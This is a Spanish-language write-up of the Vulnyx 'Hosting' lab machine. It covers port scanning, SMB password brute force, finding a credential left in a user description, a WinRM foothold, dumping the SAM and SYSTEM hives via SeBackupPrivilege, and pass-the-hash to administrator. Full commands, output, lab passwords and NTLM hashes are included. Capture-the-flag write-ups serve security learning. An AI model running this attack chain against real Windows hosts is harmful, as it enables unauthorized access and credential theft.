Vulnyx: Hosting Writeup | Easy

Table of Contents

Vulnyx: Hosting Writeup

Welcome to my detailed writeup of the easy difficulty machine “Hosting” on Vulnyx. This writeup will cover the steps taken to achieve initial foothold and escalation to root.

TCP Enumeration

1rustscan -a $TARGET --ulimit 5000 -g
2192.168.2.10 -> [80,135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670]
 1nmap -p80,135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670 -sCV $TARGET -oN allPorts
 2Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 18:06 CET
 3Nmap scan report for 192.168.2.10
 4Host is up (0.00051s latency).
 5
 6PORT      STATE SERVICE       VERSION
 780/tcp    open  http          Microsoft IIS httpd 10.0
 8|_http-server-header: Microsoft-IIS/10.0
 9| http-methods:
10|_  Potentially risky methods: TRACE
11|_http-title: IIS Windows
12135/tcp   open  msrpc         Microsoft Windows RPC
13139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
14445/tcp   open  microsoft-ds?
155040/tcp  open  unknown
165985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
17|_http-title: Not Found
18|_http-server-header: Microsoft-HTTPAPI/2.0
197680/tcp  open  pando-pub?
2047001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
21|_http-server-header: Microsoft-HTTPAPI/2.0
22|_http-title: Not Found
2349664/tcp open  msrpc         Microsoft Windows RPC
2449665/tcp open  msrpc         Microsoft Windows RPC
2549666/tcp open  msrpc         Microsoft Windows RPC
2649667/tcp open  msrpc         Microsoft Windows RPC
2749668/tcp open  msrpc         Microsoft Windows RPC
2849669/tcp open  msrpc         Microsoft Windows RPC
2949670/tcp open  msrpc         Microsoft Windows RPC
30Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
31
32Host script results:
33|_clock-skew: -1h00m01s
34| smb2-security-mode:
35|   3:1:1:
36|_    Message signing enabled but not required
37|_nbstat: NetBIOS name: HOSTING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f9:55:fd (Oracle VirtualBox virtual NIC)
38| smb2-time:
39|   date: 2025-01-02T16:09:15
40|_  start_date: N/A
41
42Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
43Nmap done: 1 IP address (1 host up) scanned in 172.18 seconds

UDP Enumeration

 1sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 192.168.2.10 -oN allPorts.UDP
 2[sudo] password for kali:
 3Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 18:05 CET
 4Nmap scan report for 192.168.2.10
 5Host is up (0.00024s latency).
 6Not shown: 1498 open|filtered udp ports (no-response)
 7PORT      STATE  SERVICE
 8137/udp   open   netbios-ns
 941370/udp closed unknown
10MAC Address: 08:00:27:F9:55:FD (Oracle VirtualBox virtual NIC)
11
12Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds

Del escaneo inicial podemos sacar algunas conclusiones, existe un servicio web, en máquinas Windows no es muy común (depende de la dificultad) ver servicios web, así que es interesante.

Vemos que no se está utilizando Kerberos, por lo cual nos olvidamos de entornos de directorio activo.

Vemos que está expuesto el puerto 5985/TCP que corresponde al protocolo WinRM, por lo cual si tenemos las credenciales de algún usuario que pertenezca al grupo Remote Management Users podríamos ganar una consola interactiva utilizando evil-winrm

Y además vemos el nombre de NetBIOS hosting, lo vamos a añadir al /etc/hosts solo por comodidad ya que no es necesario.

SMB Enumeration (unauthenticated)

No podemos enumerar el servicio SMB con una NULL SESSION.

 1➜  scan smbmap -H 192.168.2.10 -u '' -p ''
 2
 3    ________  ___      ___  _______   ___      ___       __         _______
 4   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
 5  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
 6   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
 7    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
 8   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
 9  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
10 -----------------------------------------------------------------------------
11     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
12                     https://github.com/ShawnDEvans/smbmap
13
14[*] Detected 1 hosts serving SMB
15[*] Established 0 SMB session(s)
16➜  scan smbmap -H 192.168.2.10 -u '' -p ''
17➜  scan smbclient -L 192.168.2.10 -U '' -N
18session setup failed: NT_STATUS_ACCESS_DENIED

HTTP Enumeration

whatweb no nos reporta nada interesante del servicio web.

1whatweb http://192.168.2.10
2http://192.168.2.10 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[192.168.2.10], Microsoft-IIS[10.0], Title[IIS Windows]

La raíz del sitio web es la página por defecto de los servidores IIS. Write-up Image

Fuzzeando con feroxbuster encontramos un recurso /speed

 1feroxbuster -u http://192.168.2.10/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -d 1 -t 100
 2
 3 ___  ___  __   __     __      __         __   ___
 4|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
 5|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
 6by Ben "epi" Risher 🤓                 ver: 2.10.3
 7───────────────────────────┬──────────────────────
 8 🎯  Target Url            │ http://192.168.2.10/
 9 🚀  Threads               │ 100
10 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
11 👌  Status Codes          │ All Status Codes!
12 💥  Timeout (secs)        │ 7
13 🦡  User-Agent            │ feroxbuster/2.10.3
14 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
15 🔎  Extract Links         │ true
16 🏁  HTTP methods          │ [GET]
17 🔃  Recursion Depth       │ 1
18 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
19───────────────────────────┴──────────────────────
20 🏁  Press [ENTER] to use the Scan Management Menu™
21──────────────────────────────────────────────────
22404      GET       29l       94w     1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
23200      GET      359l     2112w   178556c http://192.168.2.10/iisstart.png
24200      GET       32l       54w      696c http://192.168.2.10/
25301      GET        2l       10w      160c http://192.168.2.10/speed => http://192.168.2.10/speed/

Aquí vemos algo mas de contenido, aunque todo es muy estático. Write-up Image

En un apartado del sitio web encontramos algunos usuarios y un dominio hosting.nyx, lo vamos a añadir al /etc/hosts y vamos a hacer una lista de usuarios con los que acabamos de encontrar. Write-up Image

Esta es la lista de usuarios.

1cat -p users.txt
2p.smith
3a.krist
4m.faeny
5k.lendy

Si se utilizase kerberos podríamos comprobar que usuarios son válidos a nivel de dominio, pero bueno…

SMB Bruteforce

Fuzzeando por subdominios y por extensiones de ficheros no encontré nada, así que podemos probar la fuerza bruta (o ataques por diccionario).

Podemos hacer esto con netexec, primero vamos a probar la propia lista de usuario como contraseña y no conseguimos nada.

 1nxc smb 192.168.2.10 -u users.txt -p users.txt
 2SMB         192.168.2.10    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
 3SMB         192.168.2.10    445    HOSTING          [-] HOSTING\p.smith:p.smith STATUS_LOGON_FAILURE
 4SMB         192.168.2.10    445    HOSTING          [-] HOSTING\a.krist:p.smith STATUS_LOGON_FAILURE
 5SMB         192.168.2.10    445    HOSTING          [-] HOSTING\m.faeny:p.smith STATUS_LOGON_FAILURE
 6SMB         192.168.2.10    445    HOSTING          [-] HOSTING\k.lendy:p.smith STATUS_LOGON_FAILURE
 7SMB         192.168.2.10    445    HOSTING          [-] HOSTING\p.smith:a.krist STATUS_LOGON_FAILURE
 8SMB         192.168.2.10    445    HOSTING          [-] HOSTING\a.krist:a.krist STATUS_LOGON_FAILURE
 9SMB         192.168.2.10    445    HOSTING          [-] HOSTING\m.faeny:a.krist STATUS_LOGON_FAILURE
10SMB         192.168.2.10    445    HOSTING          [-] HOSTING\k.lendy:a.krist STATUS_LOGON_FAILURE
11SMB         192.168.2.10    445    HOSTING          [-] HOSTING\p.smith:m.faeny STATUS_LOGON_FAILURE
12SMB         192.168.2.10    445    HOSTING          [-] HOSTING\a.krist:m.faeny STATUS_LOGON_FAILURE
13SMB         192.168.2.10    445    HOSTING          [-] HOSTING\m.faeny:m.faeny STATUS_LOGON_FAILURE
14SMB         192.168.2.10    445    HOSTING          [-] HOSTING\k.lendy:m.faeny STATUS_LOGON_FAILURE
15SMB         192.168.2.10    445    HOSTING          [-] HOSTING\p.smith:k.lendy STATUS_LOGON_FAILURE
16SMB         192.168.2.10    445    HOSTING          [-] HOSTING\a.krist:k.lendy STATUS_LOGON_FAILURE
17SMB         192.168.2.10    445    HOSTING          [-] HOSTING\m.faeny:k.lendy STATUS_LOGON_FAILURE
18SMB         192.168.2.10    445    HOSTING          [-] HOSTING\k.lendy:k.lendy STATUS_LOGON_FAILURE

A la desesperada probé la lista de rockyou.txt y tuve suerte.

1nxc smb 192.168.2.10 -u users.txt -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
2SMB         192.168.2.10    445    HOSTING          [-] HOSTING\p.smith:booboo STATUS_LOGON_FAILURE
3SMB         192.168.2.10    445    HOSTING          [-] HOSTING\a.krist:booboo STATUS_LOGON_FAILURE
4SMB         192.168.2.10    445    HOSTING          [-] HOSTING\m.faeny:booboo STATUS_LOGON_FAILURE
5SMB         192.168.2.10    445    HOSTING          [-] HOSTING\k.lendy:booboo STATUS_LOGON_FAILURE
6SMB         192.168.2.10    445    HOSTING          [+] HOSTING\p.smith:kissme

Teniendo este combo, podemos listar los recursos compartidos a nivel de red pero no vemos nada.

1nxc smb 192.168.2.10 -u p.smith -p kissme --shares
2SMB         192.168.2.10    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB         192.168.2.10    445    HOSTING          [+] HOSTING\p.smith:kissme
4SMB         192.168.2.10    445    HOSTING          [*] Enumerated shares
5SMB         192.168.2.10    445    HOSTING          Share           Permissions     Remark
6SMB         192.168.2.10    445    HOSTING          -----           -----------     ------
7SMB         192.168.2.10    445    HOSTING          ADMIN$                          Admin remota
8SMB         192.168.2.10    445    HOSTING          C$                              Recurso predeterminado
9SMB         192.168.2.10    445    HOSTING          IPC$            READ            IPC remota

Enumerando los usuarios vemos algo extraño, en el usuario m.davis vemos una descripción que tiene pinta de ser una credencial.

 1nxc smb 192.168.2.10 -u p.smith -p kissme --users
 2SMB         192.168.2.10    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
 3SMB         192.168.2.10    445    HOSTING          [+] HOSTING\p.smith:kissme
 4SMB         192.168.2.10    445    HOSTING          [*] Enumerated 9 local users: HOSTING
 5SMB         192.168.2.10    445    HOSTING          -Username-                    -Last PW Set-       -BadPW- -Description-
 6SMB         192.168.2.10    445    HOSTING          Administrador                 2024-09-02 16:24:30 0
 7SMB         192.168.2.10    445    HOSTING          administrator                 2024-09-02 17:17:47 0
 8SMB         192.168.2.10    445    HOSTING          DefaultAccount                2024-09-02 16:24:40 0
 9SMB         192.168.2.10    445    HOSTING          f.miller                      2024-09-02 16:28:55 0
10SMB         192.168.2.10    445    HOSTING          Invitado                      2024-09-02 16:24:48 0
11SMB         192.168.2.10    445    HOSTING          j.wilson                      2024-09-02 16:31:36 0
12SMB         192.168.2.10    445    HOSTING          m.davis                       2024-09-02 16:29:54 0       H0$T1nG123!
13SMB         192.168.2.10    445    HOSTING          p.smith                       2024-09-02 16:18:30 0
14SMB         192.168.2.10    445    HOSTING          WDAGUtilityAccount            <never>             0

Y vemos que esta credencial es válida para j.wilson

1nxc smb 192.168.2.10 -u users.txt -p 'H0$T1nG123!'  --continue-on-success
2SMB         192.168.2.10    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB         192.168.2.10    445    HOSTING          [-] HOSTING\p.smith:H0$T1nG123! STATUS_LOGON_FAILURE
4SMB         192.168.2.10    445    HOSTING          [-] HOSTING\a.krist:H0$T1nG123! STATUS_LOGON_FAILURE
5SMB         192.168.2.10    445    HOSTING          [-] HOSTING\m.faeny:H0$T1nG123! STATUS_LOGON_FAILURE
6SMB         192.168.2.10    445    HOSTING          [-] HOSTING\k.lendy:H0$T1nG123! STATUS_LOGON_FAILURE
7SMB         192.168.2.10    445    HOSTING          [-] HOSTING\f.miller:H0$T1nG123! STATUS_LOGON_FAILURE
8SMB         192.168.2.10    445    HOSTING          [+] HOSTING\j.wilson:H0$T1nG123!
9SMB         192.168.2.10    445    HOSTING          [-] HOSTING\m.davis:H0$T1nG123! STATUS_LOGON_FAILURE

Abusing WinRM -> Foothold

Podemos comprobar que este usuario pertenece al grupo de Remote Management Users ya que netexec nos reporta Pwn3d! al comprobar esta credencial en WinRM

1nxc winrm 192.168.2.10 -u j.wilson -p 'H0$T1nG123!'
2WINRM       192.168.2.10    5985   HOSTING          [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
3WINRM       192.168.2.10    5985   HOSTING          [+] HOSTING\j.wilson:H0$T1nG123! (Pwn3d!)

Así que con evil-winrm podemos conseguir una consola como j.wilson

 1evil-winrm -i 192.168.2.10 -u j.wilson -p 'H0$T1nG123!'
 2
 3Evil-WinRM shell v3.5
 4
 5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 6
 7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 8
 9Info: Establishing connection to remote endpoint
10*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami
11hosting\j.wilson

Podemos ver la flag de usuario.

1*Evil-WinRM* PS C:\Users\j.wilson\Desktop> type user.txt
250e5add3f5cb064...

Privilege Escalation

Vemos que este usuario pertenece al grupo Backup Operators

 1*Evil-WinRM* PS C:\Users\j.wilson\Desktop> whoami /groups
 2
 3INFORMACIàN DE GRUPO
 4--------------------
 5
 6Nombre de grupo                             Tipo           SID          Atributos
 7=========================================== ============== ============ ========================================================================
 8Todos                                       Grupo conocido S-1-1-0      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
 9BUILTIN\Operadores de copia de seguridad    Alias          S-1-5-32-551 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
10BUILTIN\Usuarios                            Alias          S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
11BUILTIN\Usuarios de administraci¢n remota   Alias          S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
12NT AUTHORITY\NETWORK                        Grupo conocido S-1-5-2      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
13NT AUTHORITY\Usuarios autentificados        Grupo conocido S-1-5-11     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
14NT AUTHORITY\Esta compa¤¡a                  Grupo conocido S-1-5-15     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
15NT AUTHORITY\Cuenta local                   Grupo conocido S-1-5-113    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
16NT AUTHORITY\Autenticaci¢n NTLM             Grupo conocido S-1-5-64-10  Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
17Etiqueta obligatoria\Nivel obligatorio alto Etiqueta       S-1-16-12288

Abusing SeBackupPrivilege

Esto es interesante ya que a los usuarios de este grupo se le asigna el privilegio SeBackupPrivilege

 1*Evil-WinRM* PS C:\Users\j.wilson\Desktop> whoami /priv
 2
 3INFORMACIàN DE PRIVILEGIOS
 4--------------------------
 5
 6Nombre de privilegio          Descripci¢n                                         Estado
 7============================= =================================================== ==========
 8SeBackupPrivilege             Hacer copias de seguridad de archivos y directorios Habilitada
 9SeRestorePrivilege            Restaurar archivos y directorios                    Habilitada
10SeShutdownPrivilege           Apagar el sistema                                   Habilitada
11SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido                    Habilitada
12SeUndockPrivilege             Quitar equipo de la estaci¢n de acoplamiento        Habilitada
13SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso        Habilitada
14SeTimeZonePrivilege           Cambiar la zona horaria                             Habilitada

El privilegio SeBackupPrivilege en Windows otorga a un usuario o proceso la capacidad de acceder a archivos y directorios, ignorando las configuraciones de seguridad aplicadas a esos objetos. Este permiso suele ser utilizado por programas de respaldo o procesos que necesitan copiar o respaldar archivos a los que normalmente el usuario no tendría acceso.

No obstante, si este privilegio no se gestiona adecuadamente o se concede a usuarios o procesos no autorizados, puede convertirse en una vulnerabilidad de escalada de privilegios. Los actores malintencionados podrían explotar esta debilidad para obtener acceso no autorizado a archivos y datos sensibles del sistema.

En la máquina DC02 de HackMyVM explotamos este privilegio pero de una forma remota, en este caso tenemos una consola en la máquina víctima por lo cual es mucho mas fácil escalar privilegios.

Primero me voy a crear un directorio para trabajar comodamente.

1*Evil-WinRM* PS C:\windows\temp\work> pwd
2
3Path
4----
5C:\windows\temp\work

Ahora simplemente podemos hacer una copia del archivo SAM que recordemos que contiene todos los usuarios y sus hashes NTLM en entornos de WORKSTATION y podemos copiar el registro system que es el que contiene la clave de encriptado del archivo SAM.

 1*Evil-WinRM* PS C:\windows\temp\work> reg save hklm\sam sam.hive
 2La operaci¢n se complet¢ correctamente.
 3
 4*Evil-WinRM* PS C:\windows\temp\work> reg save hklm\system system.hive
 5La operaci¢n se complet¢ correctamente.
 6
 7*Evil-WinRM* PS C:\windows\temp\work> dir
 8
 9
10    Directorio: C:\windows\temp\work
11
12
13Mode                 LastWriteTime         Length Name
14----                 -------------         ------ ----
15-a----          1/2/2025   5:27 PM          57344 sam.hive
16-a----          1/2/2025   5:27 PM       11988992 system.hive

Ahora con la función download interna de evil-winrm vamos a descargarnos estos archivos.

 1*Evil-WinRM* PS C:\windows\temp\work> download sam.hive
 2
 3Info: Downloading C:\windows\temp\work\sam.hive to sam.hive
 4
 5Info: Download successful!
 6*Evil-WinRM* PS C:\windows\temp\work> download system.hive
 7
 8Info: Downloading C:\windows\temp\work\system.hive to system.hive
 9
10Info: Download successful!

Ahora podemos con impacket-secretsdump para dumpear el archivo SAM y obtener los hashes NTLM de los usuarios del sistema.

 1impacket-secretsdump -sam sam.hive -system system.hive LOCAL
 2Impacket v0.12.0.dev1+20240711.104209.512a1db5 - Copyright 2023 Fortra
 3
 4[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
 5[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
 6Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 7Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 8DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 9WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
10administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
11p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
12f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
13m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
14j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
15[*] Cleaning up...

Pass The Hash & evil-winrm -> Privilege Escalation

Podemos hacer Pass The Hash y vemos que la cuenta Administrador se ha deshabilitado por alguna razón, quiero pensar que ha sido un acto de buena fe del creador de la máquina ya que el nombre de usuario de esta cuenta cambia dependiendo del idioma configurado en Windows, por eso también existe una cuenta llamada administrator, para hacer la máquina algo mas “universal”.

1nxc smb 192.168.2.10 -u Administrador -H '31d6cfe0d16ae931b73c59d7e0c089c0'
2SMB         192.168.2.10    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB         192.168.2.10    445    HOSTING          [-] HOSTING\Administrador:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED

Pero podemos ver que al hacer Pass The Hash para la cuenta administrator netexec nos reporta Pwn3d! por lo cual, es una cuenta que pertenece al grupo de Administradores del Sistema.

1nxc smb 192.168.2.10 -u Administrator -H '41186fb28e283ff758bb3dbeb6fb4a5c'
2SMB         192.168.2.10    445    HOSTING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB         192.168.2.10    445    HOSTING          [+] HOSTING\Administrator:41186fb28e283ff758bb3dbeb6fb4a5c (Pwn3d!)

Entonces podemos conseguir una consola como administrator haciendo Pass The Hash con evil-winrm

 1evil-winrm -i 192.168.2.10 -u administrator -H '41186fb28e283ff758bb3dbeb6fb4a5c'
 2
 3Evil-WinRM shell v3.5
 4
 5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 6
 7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 8
 9Info: Establishing connection to remote endpoint
10*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
11hosting\administrator

Podemos ver la flag de root

1*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
29924b42399b3e0...

¡Y ya estaría!

Happy Hacking! 🚀

#Vulnyx   #Controler   #Writeup   #Cybersecurity   #Penetration Testing   #CTF   #Reverse Shell   #Privilege Escalation   #RCE   #Exploit   #Windows   #SMB Enumeration   #HTTP Enumeration   #Information Disclosure   #SMB Bruteforce   #Dictionary Attack   #Password Spraying   #Abusing WinRM   #Abusing SeBackupPrivilege   #Abusing Backup Operators   #Dumping SAM and SYSTEM Hive   #Pass the Hash